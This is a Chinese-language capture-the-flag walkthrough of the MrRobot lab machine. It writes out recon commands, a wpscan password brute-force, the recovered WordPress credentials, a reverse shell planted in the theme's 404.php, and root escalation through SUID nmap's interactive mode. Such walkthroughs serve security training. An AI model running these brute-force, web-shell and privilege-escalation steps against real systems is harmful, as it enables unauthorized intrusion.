MrRobot靶机详细解答

一、主机发现

复制代码
arp-scan -l

二、端口扫描、目录枚举、指纹识别

2.1端口扫描

复制代码
nmap -p- 192.168.55.147

发现22端口关闭,且无其它特殊端口,只能去网页中寻找信息

2.2目录枚举

复制代码
dirb http://192.168.55.147

2.3指纹识别

复制代码
nmap 192.168.55.147 -sV -sC -O --version-all

指纹识别没有发现重要信息

三、进入靶机进行信息收集

进入靶机后发现一直在播放动画,输入prepare后,发现动画中有一个域名,但是也访问不到

这个靶机的其它关键词也没有提示什么信息,看看目录枚举的结果

访问刚刚扫描出来的目录发现这个是wordpress的站

发现他不会帮助我们

继续寻找敏感目录

发现robots.txt文件,尝试将以下内容拼接到192.168.55.147后面

其中fsocity.dic被下载下来,感觉是枚举时使用的文件

这个key应该就是第一个key

在登陆页面发现有忘记密码这个功能点,尝试爆破用户名,字典就是刚刚下载下来的

发现Elliot这个用户的状态码是500,该用户大概率是存在的

在登录页面中使用Elliot用户名,只进行密码爆破即可

也可以尝试使用wpscan进行爆破

复制代码
wpscan --url http://192.168.55.147 -U Elliot -P fsocity.dic -t 50

注:该字典文件有很多重复的,可以先去重再跑

去重跑很快就可以跑出来账号和密码

复制代码
Elliot
ER28-0652

成功登陆

四、反弹shell

wordpress的插件有很多的漏洞

这里可以在插件中进行反弹shell,也可以在Appearance中进行反弹

选择404.php文件,将kali自带的反弹shell脚本复制粘贴在此处

点击update

然后访问该文件

复制代码
http://192.168.55.147/wp-admin/404.php

成功反弹shell

五、提权

5.1靶机信息收集

5.2第二个key

进入robot目录中找到了第二个key

5.3nmap提权

使用find命令查找suid权限的文件

复制代码
find / -perm -4000 -print 2>/dev/null

找到了nmap可以进行提权

这里的nmap不能直接使用,环境变量的问题,需要使用绝对路径

尝试第一种方法,发现提权不成功,版本在第二种提权方式范围内,尝试第二种方式

复制代码
/usr/local/bin/nmap --interactive
!sh

提权成功!

相关推荐
orion574 小时前
Missing Semester Class1:course overview and introduction of shell
linux
SkyWalking中文站8 小时前
认识 Horizon UI · 6/17:Trace 探索器
运维·监控·自动化运维
用户1204872216110 小时前
Linux驱动编译与加载
linux·嵌入式
程序员老赵11 小时前
服务器文件不想 SFTP 上传?Docker 跑个 File Browser,浏览器就能管理
服务器·docker·开源
火车叼位11 小时前
写给初级开发者:SSL、SSH、HTTPS 与证书体系全解析
运维
vivo互联网技术15 小时前
从 10 分钟到 1 秒:ES 深度分页任意跳页的三轮优化实战
服务器·数据库·redis·elasticsearch·深度分页
用户8055336980316 小时前
Input 子系统架构:Core、Handler、Driver 三层是怎么协作的
linux·嵌入式
用户8055336980316 小时前
RK-Forge外设系列开篇 - 把板子从「能启动」变成「能用」:Ethernet/SPI/MMC 三个纯接线外设
linux·github·嵌入式
小猿姐1 天前
唯品会大规模数据库云原生实践:基于 KubeBlocks 管理数千实例的统一运维之路
运维·elasticsearch·云原生